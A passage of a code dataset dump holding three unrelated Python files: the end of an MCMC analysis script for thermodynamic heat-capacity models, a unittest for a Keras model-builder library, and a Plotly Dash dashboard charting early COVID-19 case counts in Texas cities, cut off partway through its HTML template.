\"\"\"obtain a flattened version of the chain\"\"\"\r\n        flattrace = trace.reshape((D['nlinks']*D['nwalkers'], len(D['pname'])))\r\n\r\n    \"\"\"compute convergence diagnostics\"\"\"\r\n\r\n    # Rhat (Gelman, 2014) diagnoses convergence by checking the mixing\r\n    # of the chains as well as their stationarity. Rhat should be less than\r\n    # 1.1 for each variable of interest\r\n    Rhat = cc.gelman_diagnostic(trace, D['pname'])\r\n    msg = \"Rhat: %s\" % Rhat\r\n    cc.WP(msg, D['wrt_file'])\r\n\r\n    # neff (Gelman, 2014) gives the effective number of samples for\r\n    # each variable of interest. 
It should be greater than 10\r\n # for each variable\r\n neff = cc.effective_n(trace, D['pname'])\r\n msg = \"effective sample size: %s\" % neff\r\n cc.WP(msg, D['wrt_file'])\r\n\r\n cp.plot_chains(D['rawtrace'], flattrace, D['nlinks'], D['pname'],\r\n D['pname_plt'], pltname=D['outname'])\r\n cp.plot_squiggles(D['rawtrace'], 0, 1, D['pname_plt'],\r\n pltname=D['outname'])\r\n\r\n \"\"\"perform various analyses\"\"\"\r\n msg = \"sampling time: \" + str(D['sampling_time']) + \" seconds\"\r\n WP(msg, D['wrt_file'])\r\n\r\n msg = \"model evidence: \" + str(D['lnZ']) + \\\r\n \" +/- \" + str(D['dlnZ'])\r\n cc.WP(msg, D['wrt_file'])\r\n\r\n cc.coef_summary(flattrace, D['pname'], D['outname'])\r\n\r\n nxtprior = np.zeros((2, D['nparam']))\r\n nxtprior[0, :] = np.mean(flattrace, 0) - 5*np.std(flattrace, 0)\r\n nxtprior[1, :] = 10*np.std(flattrace, 0)\r\n np.savetxt(D['outname'] + '_prior.csv', nxtprior)\r\n\r\n cp.plot_hist(flattrace, D['pname'], D['pname_plt'], pltname=D['outname'])\r\n\r\n cp.plot_cov(flattrace, D['pname_plt'], pltname=D['outname'],\r\n tight_layout=False)\r\n\r\n \"\"\"configure model prediction plots for Cp, H, S and G\"\"\"\r\n name_list_l = [D['name_list_Cp'], D['name_list_H'], None, None]\r\n Tt_l = [D['Tt_Cp'], D['Tt_H'], None, None]\r\n At_l = [D['At_Cp'], D['At_H'], None, None]\r\n It_l = [D['It_Cp'], D['It_H'], None, None]\r\n pltper = [3, 1, 1, 1]\r\n xlim = [[(1e-10, 3000), (1e-10, 250), (1e-10, 30)],\r\n [(1e-10, 3000)],\r\n [(1e-10, 3000)],\r\n [(1e-10, 3000)]]\r\n ylim = [[None, (-2, 27), (-.5, 5)],\r\n [None],\r\n [None],\r\n [None]]\r\n on = D['outname']\r\n pltname = [[on + 'Cp', on + 'Cp_close', on + 'Cp_vclose'],\r\n [on + 'H'],\r\n [on + 'S'],\r\n [on + 'G']]\r\n xlabel = [3*[r\"$T (K)$\"],\r\n [r\"$T (K)$\"],\r\n [r\"$T (K)$\"],\r\n [r\"$T (K)$\"]]\r\n ylabel = [3*[r\"$C_p \\left(J {mol}^{-1} K^{-1}\\right)$\"],\r\n [r\"$H \\left(J {mol}^{-1} \\right)$\"],\r\n [r\"$S \\left(J {mol}^{-1} K^{-1}\\right)$\"],\r\n [r\"$G \\left(J {mol}^{-1} \\right)$\"]]\r\n legend_loc = [[None, None, 'upper left'],\r\n ['upper left'],\r\n [None],\r\n [None]]\r\n\r\n cp.plot_prediction_all(flattrace, name_list_l,\r\n Tt_l, At_l, It_l,\r\n pltper,\r\n feval_Cp_plt, feval_H_plt,\r\n deb_Cp=deb_Cp,\r\n xlim=xlim, ylim=ylim, pltname=pltname,\r\n xlabel=xlabel, ylabel=ylabel,\r\n legend_loc=legend_loc)\r\n","sub_path":"alpha_quart_debye.py","file_name":"alpha_quart_debye.py","file_ext":"py","file_size_in_byte":15790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"339042082","text":"import unittest\n\nimport mrbuilder_keras as mrb\n\n\nclass BuilderTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n mrb.load()\n\n cls.input_shape = [32, 32, 3]\n\n cls.base_params = {\n \"outputSize\": 50\n }\n\n def test_vgg16(self):\n model_builder = mrb.get_model(\"vgg16\")\n model = model_builder(self.input_shape, self.base_params)\n layers = model.layers\n self.assertEqual(len(layers),\n 65,\n \"number of layers is not correct\")\n # noinspection PyTypeChecker\n self.assertEqual(layers[0].input.shape.as_list(),\n [None] + self.input_shape,\n \"input shape is not correct\")\n self.assertEqual(layers[-1].output.shape[1],\n self.base_params[\"outputSize\"],\n \"output shape is not correct\")\n\n def test_squeezenet(self):\n model_builder = mrb.get_model(\"squeezenet\")\n params = {\n **self.base_params,\n \"initialConv\": 64,\n \"initialSqueeze\": 16\n }\n model = model_builder(self.input_shape, 
params)\n        layers = model.layers\n        self.assertEqual(layers[1].output.shape[-1],\n                         params[\"initialConv\"],\n                         \"output shape is not correct\")\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_model_library.py","file_name":"test_model_library.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"104078453","text":"#Creating dashboard of covid cases\n\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\n#import numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport numpy as np\nimport datetime as dt\nfrom datetime import datetime\n\n#Austin: http://www.austintexas.gov/COVID19\n#Dallas: https://www.dallascounty.org/covid-19/\n#Harris: http://publichealth.harriscountytx.gov/Resources/2019-Novel-Coronavirus/Harris-County-COVID-19-Confirmed-Cases\n#Texas : https://txdshs.maps.arcgis.com/apps/opsdashboard/index.html#/ed483ecd702b4298ab01e8b9cafc8b83\n\n#Johns Hopkins data: https://github.com/CSSEGISandData/COVID-19\n#https://public.tableau.com/profile/christopher.paolini#!/vizhome/COVID-19Dashboard_15850633730350/UnitedStatesCOVID-19CaseTracker\n#url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv'\n# https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv'\n\nloadnewdata = False\n\n\ncolors = {\n    'background': '#F5F5F5',\n    'text': '#484848',\n    'plotbg': '#FDFDFD'\n    }\n\n\nif loadnewdata:\n    #globalcases = pd.read_csv(url, error_bad_lines=False)\n    globalcases = pd.read_csv('jhdata_20200323.csv')\n    texascases = globalcases[globalcases['Province/State']=='Texas'].iloc[0,4:]\n\n    #Find first data for Texas\n    casestart = texascases > 0\n    texascases = texascases[casestart]\n    texascases.to_csv('texascases.csv')\n\n\n\n\n#First, get growth rate csv\ngr = pd.read_csv('gr_rate.csv')\ngrdate = gr['Date']\ngrt = (gr['Texas']-1)*100\ngra = (gr['Austin']-1)*100\ngrd = (gr['Dallas']-1)*100\ngrh = (gr['Harris']-1)*100\n\n\ntrace1 = go.Scatter(x = grdate, y = grt, name=\"Texas\", mode=\"lines+markers\")\ntrace2 = go.Scatter(x = grdate, y = gra, name=\"Austin\", mode=\"lines+markers\")\ntrace3 = go.Scatter(x = grdate, y = grd, name=\"Dallas\", mode=\"lines+markers\")\ntrace4 = go.Scatter(x = grdate, y = grh, name=\"Harris\", mode=\"lines+markers\")\ndata = [trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n    title={'text':'Growth rate over time (7 day intervals)',\n           'x':0.5,'y':0.9,\n           'xanchor':'center','yanchor':'top'},\n    yaxis=dict(\n        title='Growth rate [%]',\n        linecolor=colors['text'],\n        linewidth=2,\n        mirror=True,\n        showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n    xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside', fixedrange=True,automargin=True),\n    xaxis_title='Date',\n    autosize=True,\n    paper_bgcolor=colors['background'],\n    plot_bgcolor=colors['plotbg'],\n    font=dict(color=colors['text'],size=10),\n    legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n    )\n\nfig_gr=go.Figure(data, layout=layout)\n\n\ntexascases = pd.read_csv('texascases.csv')\nx = texascases.iloc[:,0]\ny = texascases.iloc[:,1]\ny1 = texascases.iloc[:,2]\ny2 = texascases.iloc[:,3]\n#x = texascases[casestart].index.values\n#y = 
texascases[casestart]\n\n\naustincases = pd.read_excel('AustinCases.xlsx', sheet_name='Austin')\nhoustoncases = pd.read_csv('Harris.csv')\ndallascases = pd.read_csv('Dallas.csv')\n#print(austincases.head())\n\n\n\n#####################AUSTIN #Linear\ntrace1 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], name=\"Linear\", mode = 'lines+markers')\n#trace2 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], yaxis='y2', name=\"Logarithmic\",mode = 'lines+markers', visible=False)\ntrace2 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n\n\n#ESTIMATE FOR AUSTIN\nlstdate = (austincases['Date'][len(austincases)-1])\nlstdate = datetime.strptime(lstdate, '%m/%d/%y')\nlstdate += dt.timedelta(days=1)\nlstdate = lstdate.strftime('%m/%d/%y')\n#print(lstdate)\nxt = np.arange(len(austincases['Date'])+1)\nyt1 = np.round( np.exp(xt[:6]*0.5)*3)\n#print(yt1)\nyt2 = np.round(np.exp(np.arange(len(xt[6:]))*0.140)*55)\n#print(yt2)\n#print(np.append(yt1, yt2))\nyt = np.append(yt1, yt2)\nnewdate = (austincases['Date'].copy())\nnewdate = newdate.append(pd.Series(lstdate))\n\ntrace3 = go.Scatter(x = newdate, y = yt, name='Best Fit+Estimate', visible=False, mode='lines+markers', line={'dash':'dash', 'color':'black'})\n\n\ndata = [trace1, trace2, trace3]\nlayout = go.Layout(\n title={'text':'Total Cases in Austin, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n #type=\"linear\",\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n # yaxis2=dict(\n # title='Count',\n # overlaying='y',\n #side='right',\n # type='log',\n # showgrid=False,ticks='outside',tickvals=[0,10,100],fixedrange=True,automargin=True,visible=False\n # ),\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside', fixedrange=True,automargin=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2=go.Figure(data, layout=layout)\nfig2.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n\n###############DALLAS\n\ntrace1 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], name=\"Linear\", mode = 'lines+markers')\ntrace2 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n#trace2 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], yaxis='y2', name=\"Logarithmic\",mode = 
'lines+markers')\n\ndata = [trace1, trace2]\nlayout_d = go.Layout(\n title={'text':'Total Cases in Dallas, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n # yaxis2=dict(\n # title='Log',\n # overlaying='y',\n # side='right',\n # type='log',\n # showgrid=False,ticks='outside',tickvals=[0,10,100],fixedrange=True,automargin=True\n # ),\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2d=go.Figure(data, layout=layout_d)\nfig2d.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n###############HARRIS\ntrace1 = go.Scatter(x=houstoncases['Date'], y=houstoncases['Count'], name=\"Linear\", mode = 'lines+markers')\ntrace2 = go.Scatter(x=houstoncases['Date'], y=houstoncases['Count'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n\ndata = [trace1, trace2]\nlayout_h = go.Layout(\n title={'text':'Total Cases in Harris County, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n \n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2h=go.Figure(data, layout=layout_h)\nfig2h.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n 
pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n\n\n\n\n\n\n\n########TEXAS\n\n\ntrace1 = go.Scatter(x=x, y=y, name=\"Point1-Linear\",mode = 'lines+markers')\ntrace1A = go.Scatter(x = x, y = y2, name=\"JHU-Linear\", mode='lines+markers')\ntrace2 = go.Scatter(x=x, y=(y2+y)*0.5, name=\"Average-Logarithmic\",mode = 'lines+markers', visible=False)\n\n\n#ESTIMATE FOR TEXAS\nlstdate = x[len(x)-1]\nlstdate = datetime.strptime(lstdate, '%m/%d/%y')\nlstdate += dt.timedelta(days=1)\nlstdate = lstdate.strftime('%m/%d/%y')\n#print(lstdate)\nxt = np.arange(len(x[3:])+1)\n\nyt = np.round(np.exp(xt*0.272)*3.57) #np.append(yt1, yt2)\n#print(yt)\nnewdate = x[3:].copy()\nnewdate = newdate.append(pd.Series(lstdate))\n#print(yt)\n#x = sdfsfsd\ntrace3 = go.Scatter(x = newdate, y = yt, name='Best Fit+Estimate', visible=False, mode='lines+markers', line={'dash':'dash', 'color':'black'})\n\n\ndata2 = [trace1, trace1A, trace2, trace3]\nlayout2 = go.Layout(\n title={'text':'Total Cases in Texas',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n #type='log'),\n\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n xaxis_title='Date',\n #autosize=True,\n #width=1000,\n #height=500,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig3=go.Figure(data2, layout=layout2)\nfig3.update_yaxes(tick0=20)\n\nfig3.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, True, False, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, False, True, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100, 1000], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.85,\n yanchor=\"top\"\n )\n ]\n )\n\n\n\n#fig2.update_xaxes(automargin=True)\n#fig2.show(config={'scrollZoom': True})\n#y = austincases['Cumulative Cases'].to_numpy()\n#fig2.add_trace(go.Scatter(x=austincases['Date'][1:], y=y))\n#fig2.update_layout(yaxis_type='log')\n\n\n\n\n\nexternal_stylesheets = [\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\n {\n 'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\n 'rel': 'stylesheet',\n 'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\n 'crossorigin': 'anonymous'\n }\n]\n\n#external_scripts = [{'type':\"text/javascript\",'src':'https://www.statcounter.com/counter/counter.js'}]\napp = dash.Dash(__name__, assets_external_path='http://assets/')#, external_scripts=external_scripts)\n#app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n#app.scripts.append_script({\"external_url\": 
['https://www.statcounter.com/counter/counter.js',\napp.title = 'Tracking COVID-19 cases in Austin and Texas'\n\n\n\n\n#app.css.append_css({\n#    'external_url': 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n#})\n\n#app.scripts.config.serve_locally = False\n#app.css.append_css({'external_url':'/base.css'})\n\n\n\napp.layout = html.Div(style={'backgroundColor':colors['background'],'textAlign':'center', 'max-width':'1200px',\n                             'border':'thick solid black', 'margin-left':'auto', 'margin-right':'auto', 'id':'grid'},\n                      children=[\n    html.H1(children='Keeping track of COVID-19 in Texas',\n            style={'textAlign':'center',\n                   'color':colors['text']}),\n    html.H5(style={'color':colors['text']},children='Austin data updated on 4/1/20. Texas data updated 4/1/20.'),\n    html.Div([\n        html.Div(),\n        html.Div([dcc.Graph(figure=fig3,\n                            config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n        html.Div([dcc.Graph(figure=fig2,\n                            config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n        html.Div([dcc.Graph(figure=fig2d,\n                            config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n        html.Div([dcc.Graph(figure=fig2h,\n                            config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n        html.Div([dcc.Graph(figure=fig_gr,\n                            config={'scrollZoom':True,'responsive':True})], className=\"eight columns\")],\n        className=\"row\"),\n    html.H5(style={'color':colors['text']},children='Data sources: Texas data obtained from the Johns Hopkins data set (https://github.com/CSSEGISandData) and https://coronavirus.1point3acres.com/. Austin, Dallas, Harris County data obtained from Johns Hopkins, Travis County, and USA Facts (https://usafacts.org/visualizations/coronavirus-covid-19-spread-map/). Delayed reporting results in slight discrepancies.')\n\n]\n\n    )\n\n\n#Create responsive site via https://www.w3schools.com/html/html_responsive.asp\napp.index_string = '''\n\n\n    \n        \n        \n        \n        \n        \n        \n        \n        {%metas%}\n        {%title%}\n        {%favicon%}\n        {%css%}\n    \n    \n        {%app_entry%}\n